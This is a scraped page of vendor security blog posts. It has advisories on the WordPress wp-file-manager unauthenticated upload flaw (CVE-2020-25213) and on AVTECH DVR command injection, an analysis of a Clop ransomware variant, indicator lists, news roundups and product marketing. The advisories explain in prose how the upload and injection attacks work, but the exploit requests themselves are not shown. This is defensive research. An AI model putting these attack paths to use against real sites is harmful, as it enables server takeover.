CVE-2020–25213: WordPress plugin wp-file-manager actively being exploited in the wild

/in /by

WordPress is a free and open-source content management system written in PHP. WordPress is used by more than 60 million websites. 38% of the web is built on WordPress. Its plugin architecture allows users to extend the features and functionality to tailor the websites to their specific needs.

Vulnerability | CVE-2020-25213:

An improper access control vulnerability has been reported in the File Manager plugin for WordPress. The vulnerability is due to improper access control of connector.minimal.php file while uploading files. An unauthenticated remote attacker can exploit this vulnerability by uploading a file on the target system. A successful attack could result in code execution in the security context of the target WordPress server.

The vulnerable program is connector.minimal.php in wp-content/plugins/wp-file-manager/lib/php/. This vulnerability is due to the fact that the file connector.minimal.php can be accessed by an unauthenticated attacker. connector.minimal.php file loads elFinderConnector.class.php which is capable of reading HTTP request parameters and facilitating the execution of File Manager features such as file upload.  connnector.minimal.php does not implement any authorization mechanisms such as checking the privileges of the user making the request. As a result, an unauthenticated attacker can upload arbitrary files to the server, such as a malicious PHP file, potentially leading to the execution of arbitrary code.

Exploit:

In the above exploit request, the php file “test_php_info.php” can be replaced with any arbitrary file we want to upload on the server. Other than “upload” command, “mkfile and “put” commands available in elFinder could be used to write a PHP file into the file directory and later perform arbitrary remote code execution.

Trend Chart:

Patch:
The below products are affected by this vulnerability.
• File Manager Pro File Manager Plugin for WordPress 6.0 to 6.8
• File Manager Pro File Manager Pro Plugin for WordPress 7.6 to 7.8

The File Manager plugin patched the issue by removing the “lib/php/connector.minimal.php” file from the plugin. Manually removing this file should also prevent attackers from exploiting this vulnerability.

Refer vendor advisory here

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15205 WordPress wp-file-manager Plugin Remote Code Execution

Indicators of compromise:
13.85.84.182
176.113.115.89
193.27.229.26
13.82.220.36
20.185.0.202
18.207.254.243
51.11.136.167
52.186.156.31
34.226.244.53
18.207.224.249
37.59.35.206
160.20.147.136
161.35.90.11
13.66.185.182
104.248.238.198

PC Magazine Readers: SonicWall VPN Ranks High in Overall Satisfaction, Reliability, Performance

/0 Comments/in /by

The dramatic increase in remote and mobile workforces has made employees much more savvy when it comes to their virtual private network (VPN). With more people working from home than ever before, it’s imperative that private networks are as safe as those at their offices via secure mobile access and remote access solutions.

Luckily, business VPN clients are provided by IT departments to ensure that an organization’s data and intellectual property are safe and secure from inquisitive co-workers or cybercriminals looking for a target.

“After the start of the COVID-19 pandemic, remote workforce became the norm and corporate networks became more vulnerable as adversaries found new ways to exploit the situation,” said SonicWall VP of Products Jayant Thakre. “IT departments of enterprises, governments organizations, and SMBs quickly realized that they needed to secure remote access for both managed and unmanaged devices with the best-of-breed solutions to reduce the attack surface and protect themselves.”

In a recent PC Magazine survey invitation to its PCMag.com community members, respondents were asked to rate products and services they are currently using to address security and connectivity issues brought upon IT departments by the COVID-19 pandemic.

When compared to seven other vendors, SonicWall earned high ratings in categories such as ‘overall satisfaction,’ ‘reliability’ and ‘performance.’ Placing second to this year’s overall winner, SonicWall’s Net Promoter® Score (NPS) was above the group average, a score determined by averaging the ‘Likelihood to Recommend (on a scale of -100 to +100)’ responses.

SonicWall’s flagship VPN solution, Secure Mobile Access (SMA) enables organizations to provide anytime, anywhere and any device access to any application. SMA’s granular access control policy engine, context-aware device authorization, application-level VPN and advanced authentication with single sign-on enable organizations to move to the cloud with ease, and embrace BYOD and mobility in a hybrid IT environment.

For more details on SonicWall VPN rankings, ratings and reviews in PC Mag, please visit: https://www.pcmag.com/news/business-choice-awards-2020-vpn-services-for-work-remote-access.

Cybersecurity News & Trends – 10-30-20

/0 Comments/in /by

This week, Ryuk is on the rise, medical records are on display, and Maze is on its way out.

SonicWall in the News

Amid Pandemic, Hospitals Warned of ‘Credible’ and ‘Imminent’ Cyberthreat — ABC News

  • SonicWall’s Q3 threat data detailing the increase of Ryuk ransomware is cited in this article, which centers around FBI’s warning of potential attacks against healthcare providers.

Review: The SonicWall SWS12-10FPOE Switch Simplifies Security — BizTech

  • This article reviews the SWS12-10FPOE Switch and mentions the benefit the product will have on small businesses and branch offices.

FBI Warns of Imminent Wave of Ransomware Attacks Hitting Hospitals — CNET

  • SonicWall’s Q3 Threat Data on the surge of ransomware is included in CNET’s article covering potential attacks on the healthcare industry.

Ryuk Wakes From Hibernation; FBI, DHS Warn of Healthcare Attacks —  Cybersecurity Dive

  • Samantha Schwartz included SonicWall’s Q3 Threat data and a quote from CEO Bill Conner in an article on possible upcoming attacks on the healthcare industry.

Venomous Bear and Charming Kitten Are Mentioned In Dispatches. Ryuk Targets Hospitals. Maze Shutdown? — CyberWire

  • CyberWire included a link to SonicWall’s Q3 Threat data press release in the “Cyber Trends” section of its daily newsletter.

Malware Levels Drop Attacks Become More Targeted — BetaNews

  • BetaNews’ article cites SonicWall’s Q3 Threat data, highlighting the drop in malware and the rise in ransomware and IoT malware attacks so far in 2020.

Ryuk Ransomware Responsible for One Third of All Ransomware Attacks in 2020 — Security Magazine

  • Security Magazine reports on SonicWall’s Q3 Threat Data, highlighting the surge in Ryuk ransomware that’s occurred in 2020.

Industry News

Maze ransomware is shutting down its cybercrime operation — Bleeping Computer

  • The Maze cybercrime gang is shutting down its operations after becoming one of the most prominent ransomware groups.

Trump Campaign Website Is Defaced by Hackers — The New York Times

  • The defacement lasted less than 30 minutes, and the hackers appeared to be looking to generate cryptocurrency.

Microsoft says Iranian hackers targeted conference attendees — The Washington Times

  • Iranian hackers reportedly posed as conference organizers in an attempt to break into the email accounts of “high-profile” people.

EXCLUSIVE: Medical Records of 3.5 Million U.S. Patients Can be Accessed and Manipulated by Anyone — Security Week

  • The results of 13 million medical examinations relating to around 3.5 million U.S. patients are unprotected and available to anyone on the internet, SecurityWeek has learned.

Spy agency ducks questions about ‘back doors’ in tech products — Reuters

  • The U.S. National Security Agency is rebuffing efforts by a leading congressional critic to determine whether it is continuing to place so-called back doors into commercial technology products, a controversial practice that critics say damages both U.S. industry and national security.

FBI: Hackers stole government source code via SonarQube instances — Bleeping Computer

  • The FBI issued a flash alert warning of hackers stealing data from U.S. government agencies and enterprise organizations via insecure and internet-exposed SonarQube instances.

Election Officials Warn of Widespread Suspicious Email Campaign — The Wall Street Journal

  • Local election officials in the U.S. have been receiving suspicious emails that appear to be part of a widespread and potentially malicious campaign targeting several states.

Bitcoin Approaches Highest Level Since Post-Bubble Crash in 2018 — Bloomberg

  • Bitcoin is approaching levels not seen in nearly three years.

US Treasury Sanctions Russian Institution Linked to Triton Malware — Dark Reading

  • Triton, also known as TRISIS and HatMan, was developed to target and manipulate industrial control systems, the US Treasury reports.

REvil ransomware gang claims over $100 million profit in a year — Bleeping Computer

  • REvil ransomware developers say that they made more than $100 million in one year of extorting large businesses.

Data breach at Finnish psychotherapy center takes a darker turn with extortion attempts — Cyberscoop

  • Patients of a prominent Finnish psychotherapy practice reportedly had their information posted on the dark web after being told they could protect their data by directly paying a ransom.

In Case You Missed It

Q3 Cyber Threat Intelligence Details a September to Remember

/0 Comments/in /by

Despite predictions from many in the political sphere, the autumn of 2020 didn’t bring an October Surprise. But it did bring plenty of September compromise, as cybercriminals ramped up their nefarious activities to an unprecedented level.

Based on SonicWall’s Q3 cyber threat intelligence data, in nearly every threat category, the numbers for September were doing one of two things: rising, or skyrocketing. Between packed hospitals, unsecure remote students and workers, and perhaps the most high-profile presidential election in the last 50 years, there have never been so many vulnerable to attack — or so many willing to profit from them.

“For most of us, 2020 has been the year where we’ve seen economies almost stop, morning commutes end and traditional offices disappear,” said SonicWall President and CEO Bill Conner. “However, the overnight emergence of remote workforces and virtual offices has given cybercriminals new and attractive vectors to exploit. These findings show their relentless pursuit to obtain what is not rightfully theirs for monetary gain, economic dominance and global recognition.”

SonicWall, which blocks an average of more than 28 million malware attacks globally each day, recorded 4.4 billion malware attacks and 199.7 million ransomware attacks globally through the first three quarters of 2020, a year-over-year decrease of 39% and increase of 40%, respectively. Here’s a closer look at what we found:

Malware down 39% overall … but trending upward

Overall in Q3 2020 malware has continued to drop, falling to 4.4 billion hits — a nearly 40% decrease from last year. The news was even better in some areas; for example, in Germany malware dropped by nearly two-thirds, and in India it fell by nearly 70%, according to SonicWall data.

It’s worth noting, however, that Q3 ended on a much-less-optimistic note. As you’d expect with such a decrease, only two months in 2020 registered an increase in malware: May and September. May’s (relatively) modest gain of 13.3 million was little more than a blip, and quickly reversed itself.

The increase in September, however, is significantly more worrying. First of all, the increase between August and September is nearly five times as large as that between April and May, and added a total of 59 million hits.

Second, since September is the last month in Q3 (and thus the last month for which we have complete data), we don’t know yet if this is an anomaly, or if this is the first sign of malware attacks beginning to rise again from what many had expected to be a slow, but permanent, decline.

Ongoing increase in Ransomware picking up steam

In the mid-year update to the SonicWall 2020 Cyber Threat Report, we noted that the total number of ransomware hits during the first half of the year was up 20% over the same time period in 2019. But with June registering a slight decrease, we hoped that this would mark the beginning of a trend, and that ransomware’s reign of terror would, if not end, at least give us a bit of breathing room during an otherwise difficult time.

In true 2020 fashion, it turns out the opposite has happened, as the 20% increase at the end of Q2 grew to a 40% increase by the end of Q3. While that’s worrying enough, the pace of this increase offers further cause for concern.

After a small increase of 12.4% from June to July (16.7 million to 18.8 million), August and September continued to pick up momentum. Between July and August, total ransomware rose from 18.8 million to 25.5 million, and then from August to September it jumped even more, from 25.5 million to 34.1 million.

Ryuk attacks account for third of year’s ransomware

Much of this increase is coming from the precipitous rise in the number of Ryuk detections. First discovered in August 2018, Ryuk is a relatively young ransomware family, and one that got off to a slow start among SonicWall customers.

Through Q3 2019, SonicWall detected just 5,277 Ryuk attacks. Through Q3 2020, SonicWall detected 67.3 million Ryuk attacks. Not only does this amount to a mind-blowing 1,275,245% increase, it also represents more than a third of all ransomware attacks so far this year.

Ryuk is especially dangerous because it’s targeted, manual and often leveraged via a multi-stage attack (Emotet > Trickbot > Ryuk.) In other words, Ryuk is like the cockroach of the malware world — if you see it, chances are the infestation goes much, much deeper than you think.

The fact that SonicWall is seeing such a large uptick implies that Ryuk may be proliferating to larger groups of criminals, increasing the chances of any one organization being hit. However, this spike could also mean that Ryuk operators have begun hunting outside their usual stomping grounds and have started attacking SMBs and schools as well.

Unfortunately, we’ve also seen an increase in attacks on hospitals — and the problem may soon get much worse. Based on “credible information of an increased and imminent cybercrime threat to U.S. hospitals,” on October 28 CISA, FBI and HHS issued a joint cybersecurity advisory warning that the Ryuk ransomware may gain entry via Trickbot, and strongly advised hospitals and other healthcare facilities to take the recommended steps to protect against being compromised.

IoT malware hits second-highest level ever

In our mid-year update to the 2020 SonicWall Cyber Threat Report, we noted that, if the patterns we were seeing at the time held, total IoT attacks for 2020 would surpass both 2018 and 2019 levels.

Now, with an entire quarter left to go, we’ve already nearly reached that point. Through Q3, SonicWall registered 32.4 million IoT malware attacks, closing in on 2019’s total of 34.4 million attacks and within a hair’s breadth of 2018’s total (32.7 million attacks).

But once again, the real story here is September. During that month, SonicWall recorded 6.8 million IoT malware attacks, up 137% from the previous month, and more than the totals for July and August put together. This number also represents an increase of 69.2% over 2020’s previous high in March, and is 68.7% higher than in September 2019.

5G and the Security of Connected Devices

/0 Comments/in /by

In a world with watches that wirelessly beam video across the country, refrigerators that can read you the local weather report and Wi-Fi-enabled barbecue grills, it’s hard to imagine the world of connected devices becoming much more complex.

But the imminent 5G revolution is likely to bring with it devices that advance comfort, convenience, entertainment and safety in ways we never thought possible — all of which will need secure wireless controls as to not be turned against us.

During the final week of National Cybersecurity Awareness Month (NCSAM), we’re taking a closer look at the future of 5G and internet-connected devices — how they could benefit us, what sorts of dangers they could pose, and what we can do to secure them, both now and into the future.

“5G will pump $12 trillion into the global economy by 2035 and add 22 million new jobs in the United States alone”

According to the New Yorker, “5G will pump $12 trillion into the global economy by 2035 and add 22 million new jobs in the United States alone,” while ushering in “a fourth industrial revolution.”

This could be hard to imagine if you primarily view 5G as something that could someday allow you to download the entire Harry Potter film catalog faster than you can say “Accio Nostalgia!” But the true value of 5G to society is likely to come in the form of technological advancements not intended for the consumer market, such as robots making precision-machined components in a factory; surgeons using VR headsets and gloves to perform surgeries remotely; and smart cities that function as a sort of macrocosm of our current smart homes, tying together things like trash collection, parking meters and public restrooms to improve safety, sanitization and convenience.

That isn’t to say there won’t be plenty for the average consumer to enjoy, however. Truly autonomous vehicles that connect with traffic signals and other vehicles and react more quickly than human drivers are already in the works, and console-quality video games on your phone (or video games on your console with near-zero lag) are a logical next step once the anticipated reductions in latency come to pass.

Stores that allow you to try on clothing without stepping foot into a dressing room — or see what a new sofa would look like in your living room without leaving the furniture store — are a natural progression from the sort of augmented reality first brought to the mainstream by Pokémon Go.

And that’s to say nothing of your cellphone: anticipated download speeds of up to 10 Gbps will revolutionize what you can do with your phone, how quickly you can do it, and how many things you can do at once without affecting performance.

But as with other advances in digital technology, the same things that can make life easier for us can also make life immeasurably more difficult in the hands of cybercriminals. 5G will significantly increase the number of IoT devices coming online — and right now IoT security regulations are basically nonexistent.

As a result, as this increasing attack surface continues to draw more cybercriminals, we’re likely to see skyrocketing rates of IoT malware. The addition of more devices and more bandwidth doesn’t just give cybercriminals more to target directly — it could also bring about DDoS attacks far more debilitating and widespread than the ones we see today. Wireless security will be a must.

To stop the influx of attacks will require the cooperation of all stakeholders. Minimum cybersecurity requirements for manufacturers of IoT devices would go a long way toward preventing attacks, as would the establishment of a rating system (similar to the ones that currently measure usage cost on water heaters) to inform customers how safe a particular device is compared to others.

There are also things users can do to stay safe — many of which are best practices now, but will become crucial as 5G technology is fully adopted:

  • Install malware protection on your devices, if it isn’t there already
  • Ensure that none of your devices, particularly IoT devices, are still using the factory default password
  • Always make sure that your devices are patched and running the latest OS version
  • Keep up with the latest developments in cybercrime — just because you’re adequately secured now doesn’t mean you will be in the future
  • Only purchase internet-connected devices from companies who have made securing these devices a top priority.

As Champions of National Cyber Security Awareness Month, SonicWall is committed to helping organizations develop strategies for anywhere, anytime, any device security — not just during October, but all year long. For more cybersecurity news and tips, follow us on social media and check out our blog.

A new variant of Clop Ransomware surfaces

/in /by

The SonicWall Capture Labs threat research team observed reports of a new variant family of Clop ransomware (Detected as Clop.RSM) actively spreading in the wild.

The Clop ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle

The ransomware adds the following files to the system:

  • Malware.exe
  • %CurrentFolder%\HotGIrls (ZeroKb)
  • %CurrentFolder%\Clearnetworkdns_11-22-33.bat

In order to deceive the emulator and avoid execution of the real malicious code in the time bound sandboxes, it calls APIs from Kernel32.dll with invalid parameters. The loop is repeated 666000 times.

After the completion of the loop it starts enumerating running process.

Malware checks the presence of below processes belonging to security vendors:

  • SBAMSvc.exe (GFI AntiMalware antivirus product)
  • VipreAAPSvc.exe (Vipre antivirus product)
  • SBAMTray.exe (Vipre antivirus product)
  • SBPIMSvc.exe (Sunbelt AntiMalware antivirus product)
  • WRSA.exe (WebRoot antivirus product)

If it finds the presence any of these processes it delay the execution by 10 seconds by calling Sleep() api twice with 5 seconds as a parameter.

It creates a Mutex “^_-HappyLife^_-” and checks if its was previously created by calling “WaitForSingleObject” and checking the result with 0. If the result is non zero it means that another instance is running, in that case it exits.

After that it follows the normal execution path (the execution path in which there was no presence of above mentioned security vendor processes)

It drops a batch file in the current folder from where the malware sample is executed and executes the batch file using ShellExecute API.

It then creates two threads, one of the thread uses MPR.DLL for enumerating network resources and encrypting files found on the network drives and other thread is used for enumerating running process:

It searches directory and sub directory using FindFirstFile and FindNextFile APIs, after which a unique hash is calculated using path of the FileName / FolderName which are then compared with hardcoded hash values. If the hash matches the Folder or the File are not encrypted:

In the second thread it starts enumerating the processes, the name of the process are then converted into the upper case:

And using the same logic which was used to calculate the hash value for the FileName /FolderName a unique hash value is calculated.
The hash value is then compared with hardcoded hash values and the process for which the hash is matched is terminated.

It encrypts each bytes of the file with the randomly generated AES key, after encryption at the end of the file it adds the mark “Clop^_”. After the mark it puts the key used to crypt the file ciphered with the master RSA key that has hardcoded the malware.

The .Clop extension is appended to the encrypted files.

And in each folder it drops the ClopReadMe.txt containing ransom note.

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Clop.RSM (Trojan)

Cybersecurity News & Trends – 10-23-20

/0 Comments/in /by

While election security is still making headlines, education news moved to the forefront this week as K-12 institutions continue fighting off a barrage of cyberattacks.

SonicWall in the News

Hackney Council Cyberattack: Why Are Hackers Targeting The Public Sector? — IT Supply Chain

  • Terry Greer-King, VP of EMEA at SonicWall, offers some perspective on the Hackney Council cyberattack — and a warning to other public bodies.

National Cybersecurity Awareness Month – Empower Organizations in Cybersecurity Protocols — Business 2 Community

  • Companies should be doing more to defend against cyberattacks, and during Cybersecurity Awareness Month, cybersecurity professionals are committed to telling you how.

Ripple20 Isn’t An Anomaly – IoT Security is a Mess (Still) — Infosecurity Magazine

  • A new SonicWall report found a 50% increase in IoT malware attacks in the first half of 2020 alone — a number that’s sure to rise further as the number of IoT devices coming online continues to rise.

Industry News

UK’s GCHQ spy chief: We must engage business to harness cyber talent for future — Reuters

  • The head of Britain’s GCHQ agency said on Wednesday it was seeking to engage more with business to harness top cyber talent.

Botnet Fights Back After Microsoft’s Election Security Takedown — Bloomberg

  • After Microsoft led a global attack against a highly prolific malware group, the company says it’s winning the battle to destabilize the malicious botnet ahead of the U.S. presidential election.

LockBit ransomware moves quietly on the network, strikes fast — Bleeping Computer

  • LockBit ransomware takes as little as five minutes to deploy the encryption routine on target systems once it lands on the victim network.

Mysterious ‘Robin Hood’ hackers donating stolen money — BBC

  • Darkside hackers claim to have extorted millions of dollars from companies, but say they now want to “make the world a better place.” In a post on the Dark Web, the gang posted receipts for $10,000 in Bitcoin donations to two charities.

U.S. Accuses Google of Illegally Protecting Monopoly — The New York Times

  • A victory for the government could remake one of America’s most recognizable companies and the internet economy that it has helped define.

Hackers Smell Blood as Schools Grapple With Virtual Instruction — The Wall Street Journal

  • Many K-12 schools opting for virtual instruction distributed devices to students and teachers. Now, as this unique school year unfolds, hackers are circling.

TrickBot malware under siege from all sides, and it’s working — Bleeping Computer

  • The Trickbot malware operation is on the brink of going down completely following efforts from an alliance of cybersecurity and hosting providers targeting the botnet’s command-and-control servers.

Democrats introduce bill providing $400 million to protect schools from cyberattacks — The Hill

  • The Enhancing K-12 Cybersecurity Act would establish a $400 million “K-12 Cybersecurity Human Capacity” grant program to help protect educational institutions against attacks.

Hackers now abuse BaseCamp for free malware hosting — Bleeping Computer

  • Phishing campaigns have started using Basecamp as part of malicious phishing campaigns that distribute malware or steal login credentials.

Fancy Bear Imposters Are on a Hacking Extortion Spree — Wired

  • Companies worldwide are getting extortion notices from hackers, which claim to be Fancy Bear or the Lazarus Group, warning them to pay up or face powerful DDoS attacks.

Federal watchdog finds escalating cyberattacks on schools pose potential harm to students — The Hill

  • The Government Accountability Office (GAO), a federal watchdog agency, has concluded that an increasing number of cyberattacks on educational institutions are putting students increasingly at risk.

Thousands of infected IoT devices used in for-profit anonymity service — Ars Technica

  • Some 9,000 devices — mostly Android, but also Linux and Darwin OS— have been corralled into the Interplanetary Storm, a botnet whose chief purpose is creating a for-profit proxy service.

Trump signs legislation making hacking voting systems a federal crime — The Hill

  • Trump has signed the Defending the Integrity of Voting Systems Act unanimously approved by the House last month, over a year after the Senate also unanimously passed the legislation.

In Case You Missed It

Capture Client: Purpose-Built for the Distributed Workforce

/0 Comments/in /by

Before COVID-19 shelter-in-place orders were enacted across North America, I created several educational pieces on the subject of the distributed workforce. At that time, 70% of endpoints in the average company could be found outside the walls of the office at least once a week, and 53% of them could be away from perimeter defenses and physical accountability half of the week or more.

Now that this percentage has risen to nearly 100%, the focus at SonicWall is to give companies more visibility into what endpoints are doing, as well as more tools to keep people accountable, productive and safe online, whether or not they are coming in through VPN.

SonicWall Capture Client was designed to be a standalone security offering with optional built-in synergies with the SonicWall ecosystem. It was intended for the distributed workforce from Day One, and since then we’ve added more tools to stop attacks before they can damage systems, more freedom to add granular controls to web content, and soon, more tools for those who manage tenants.

From the solution’s first build, the goal has been to stop attacks before and as they execute, with remediation steps to quickly resolve problems if an attack ever causes damage. Since those early days, we’ve added Capture ATP sandboxing integration, Device Control to stop infected USB devices, Attack Visualization and more.

Today, Capture Client is widely relied on to keep remote employees safe from outside threats as well as from harmful web properties. By combining Security, Web Filtering and Device Control, Capture Client offers an ideal work-from-home solution:

Security

SonicWall has always been a security-first company. From our beginnings in network security, protecting endpoints from outside threats is in our corporate DNA.

Since many endpoints may not be connecting with the company infrastructure via VPN, endpoint security is usually the first and last line of defense. By leveraging the SentinelOne anti-malware engine, which combines AI with Capture ATP sandboxing integration, we are stopping most (nearly all) attacks before and as the execute. First, the AI engine is constantly monitoring system changes for malicious intent. Secondly, if the engine can’t fully convict a suspicious file, it will be sent to a Capture ATP PoP (Point of Presence) for evaluation. Since Capture ATP can do more with a file than your endpoint is allowed to do by the OS, it can flush out sleeping or seemingly innocuous threats.

This means that, if an employee downloads a malicious attachment from their private email or lands on an infected phishing site, Capture Client’s continuous monitoring technology will stop the attack and inform the end user of the event. If an employee downloads a file designed to activate and connect with a C&C server at a designated time in the future, Capture ATP will identify the threat. If remediation is required, administrators can step in and quickly get any Windows machine back to its last known clean state, no matter where the endpoint sits.

Web Filtering

Years ago, SonicWall first developed Content Filtering Service (CFS) for firewalls — and Content Filtering Client (CFC) — based on our work with school districts, where the goal was to protect the most impressionable among us from abusive content and prevent sites like YouTube from taking too much of a school’s bandwidth. CFS and CFC (which is used to enforce the polices on devices away from firewalls) were built with a lot of tools for those that needed it most — but the business community was also able to benefit from its granular control of web content as needed. These tools have now been added to Capture Client for your use; here are some use cases listed in order of commonality for business users:

Blocking malicious content

The little-known secret that I am trying to reveal is that a lot of companies have access to Content Filtering in one shape or form, but don’t use it. You don’t have to get fancy with it; you can simply use it to block millions of known malicious phishing sites, hacking domains and other malicious IP addresses (think botnets or C&C servers).

Blocking inappropriate material

Every company has an Internet usage policy to help employees avoid certain categories of web content. There are over 50 categories such as Adult/Mature Content, Drugs/Illegal Drugs, Illegal Skills, or Nudism that can be blocked.

Blocking specific social media outlets

When shelter-in-place orders forced workers to stay in their homes, the first complaints from admins I heard (outside of VPN connectivity) were about trying to keep the network open for business traffic due to too many users watching TikTok videos. Some admins will create granular policies to block TikTok, yet keep YouTube open. Policies can also be created to give marketing departments access to Facebook and Twitter, but block their use by those in other departments.

Bandwidth management

If, for example, YouTube is taking up too much bandwidth as people are pulling it through your servers via VPN, one could limit the amount of bandwidth a specific web property can use.

Device Control

In 46% of American homes, both parents are working — which means endpoints from two different companies may sit side by side most of the day. How many of these couples use the same USB devices? Capture Client has the ability to block unknown devices from connecting to the employee endpoint to prevent infection by a compromised USB from another company’s endpoint. If malware was to jump between companies in 2020, this might be a top-three threat vector. But even if you don’t use the Device Control feature, the AI engine within Capture Client will still notice the malicious behavior and stop any malicious scripts from executing.

Conclusion

In short, Capture Client helps secure work-from-home by being a top-in-class, first and last line of defense against online attacks and infected devices, as well as enforcing your internet usage policies. If you’d like more information on how Capture Client keeps people working safely no matter where they are, you’re welcome to listen to one of my recent webcasts, “You Can’t Stop What You Can’t See.”

Attackers actively targeting vulnerable AVTECH devices

/in /by

SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in AVTECH devices. AVTECH’s primary products are DVR and mobile surveillance systems. It’s products target the IP camera market and are commonly used in intelligence surveillance systems.
Attackers are targeting following two vulnerabilities in AVTECH’s products :

1.Unauthenticated command injection in DVR devices

The cgi_query action in Search.cgi performs HTML requests with the wget system command, which uses the received parameters without sanitization or verification. By exploiting this issue, an attacker can execute any system command with root privileges without authentication.

Following are the list of exploits spotted in the wild

2. Authenticated command injection in CloudSetup.cgi

Devices that support the Avtech cloud contain CloudSetup.cgi, which can be accessed after authentication. The exefile parameter of a CloudSetup.cgi request specifies the system command to be executed.Since there is no verification or white list-based checking of the exefile parameter, an attacker can execute arbitrary system commands with root privileges.

Following are the list of exploits spotted in the wild for this vulnerability

Decoding the URLs and taking a closer look at them .

Both exploits connect to malicious domain and download a shell script. The exploit changes the file permissions and executes the shell script. This in turn is again used to connect to the attacker controlled server to download more malicious files.

SonicWall Capture Labs provides protection against this threat via following signatures:

  • IPS 14697:AVTECH Devices Command Injection
  • IPS 13035:AVTECH Devices Remote Command Execution
  • GAV:Mirai.H
  • GAV:Mirai.H_2
  • GAV:MiraiA.N
  • GAV:MiraiA.N_2

Threat Graph

IoCs:
185.172.110.205
185.172.110.241
185.172.111.196
185.172.111.202
45.95.168.98
dcdeae98d9ab0fa3005ec36b1f55bb5b
99d3ce410735ba5e7008198aae3a6e39
4dcfa2daeb85d89da784e5e1928062de
148a1941582372ce22eacf86b5c7f852

 

Securing Internet-Connected Devices in Healthcare

/0 Comments/in , , /by

This article is based on an interview with SonicWall PreSales Engineer Barbara Vibbert, who spent 10 years in healthcare IT and more than 20 years in information security.

From the carts that roll from room to room checking vital signs to the tablet at the check-in desk, internet-connected devices can be seen during every hospital visit. What isn’t visible, however, is the massive infrastructure required to connect and secure them.

While these connected devices have brought countless benefits to healthcare, they also have the potential to endanger patient privacy, data integrity and even the continued survival of the hospitals themselves.

Access control in healthcare environments

Most doctors are not employed by the hospital where they work. Nor are many of the people in charge of maintaining equipment. These individuals have their own laptops, tablets and other devices that IT has no control over, but they require network access in order to do the jobs that keep the hospital running.

Hospitals’ vast access control teams are also needed to regularly onboard large numbers of people at once. In most IT departments, users are onboarded and offboarded throughout the year as employees come and go. In hospitals, however, a large influx of new users must be added each year around July 1, when hospital residencies begin. There can be hundreds of new residents and fellows per year that require onboarding, but hospitals generally only have a five-day window to get them up and running.

An equally sizeable, but completely unpredictable, wave of new users must be onboarded during nursing strikes. Depending on the size of the nursing staff, IT may have to quickly add several hundred new visiting nurses to the network with little warning.

Even within the hospital, data must be accessible for purposes not directly tied to patient care; for example, research and billing. But greater accessibility always brings with it greater risk. In May, an Ohio medical center posted an Excel spreadsheet on its website to comply with new requirements about cost transparency. However, inadvertently included in the spreadsheet were the names, diagnoses, treatment histories and other information of nearly 4,000 patients — a major violation of patient confidentiality laws.

Teleworking in healthcare environments

The online services that hospitals use also have patient privacy implications — and with many healthcare workers now working from home, this is a bigger concern than ever. For example, many hospitals don’t host their own telemedicine, relying instead on Zoom-like platforms … or Zoom itself. Because these sorts of platforms weren’t designed to comply with the heightened privacy regulations governing the healthcare industry, they can present a privacy risk.

The danger here isn’t limited to online interlopers, however. With employees no longer afforded the seclusion of their offices, a number of low-tech privacy risks emerge. For example, if a medical professional is doing a psychiatric consultation from home, a spouse, roommate or even a passer-by could potentially see and hear what’s being discussed through an open door or window.

IoT Devices in healthcare environments

Human-operated devices aren’t the only ones that need safeguarding. Hospitals use countless Internet of Things (IoT) devices, responsible for everything from monitoring patient heart rates, to regulating sleep apnea, to ensuring new parents don’t accidentally leave the hospital with the wrong baby.

You don’t need to worry about cybercriminals hacking into your blood pressure cuff or pulse oximeter, however — these devices are on a separate network that is highly secured and largely inaccessible.

This is largely due to the widespread inability to update and patch these devices. FDA approval is required for any device that comes into contact with a patient. But that approval only extends to the device’s state at the time of approval.

In other words, patching, updating or otherwise altering these devices nullifies the approval. To get around this security hurdle, hospitals make extensive use of firewalls: Without them, having a device on the network that can make the difference between life and death, but can also contain unpatchable vulnerabilities, would simply be too big a liability.

… Plus All the Usual Suspects

If that wasn’t enough, hospitals still have to contend with the standard IT hazards, such as phishing, ransomware and remote work risks. Hospital IT should be the last line of defense against phishing — busy doctors and nurses can’t be expected to investigate the legitimacy of emails when every second spent doing so is one less spent on patient care.

But given the massive uptick in attacks targeting hospitals, the number of phishing emails that get through and successfully fool employees is on the rise. According to Healthcare Finance, during a recent study employees clicked on roughly 1 in 7 simulated phishing emails, putting hospitals at risk for threats such as credential theft and ransomware.

And ransomware has the potential to be especially devastating for hospitals. Taking the billing department offline for a week can put any hospital in a tight spot, or in the case of smaller hospitals, even drive them to bankruptcy. And without the ability to collect or access patient data, facilities have to turn patients away — which can be deadly.

How hospitals, healthcare organizations can improve security hygiene

While more devices necessarily means more risk, these risks can be mitigated. One way is through network segmentation. By isolating different parts of the care practice, hospitals could reduce the potential destructiveness of cyberthreats. And with fewer people able to access each piece of patient data, privacy risks would be reduced as well.

There are also several steps individuals can take:

  • Keep devices patched and up to date. This is a good habit in general, but it’s crucial when accessing hospital networks from home.
  • Deploy a firewall for your home network. (Even the one built into Windows offers some protection.)
  • Use next-generation antimalware protection. Today’s advanced threats can bypass traditional signature-based antivirus software.

As Champions of National Cyber Security Awareness Month, SonicWall is committed to helping organizations in every industry protect against the threats of today and prepare for the threats of tomorrow. To learn more, check back next week as we explore what future threats could look like, and how we as individuals can help prevent them.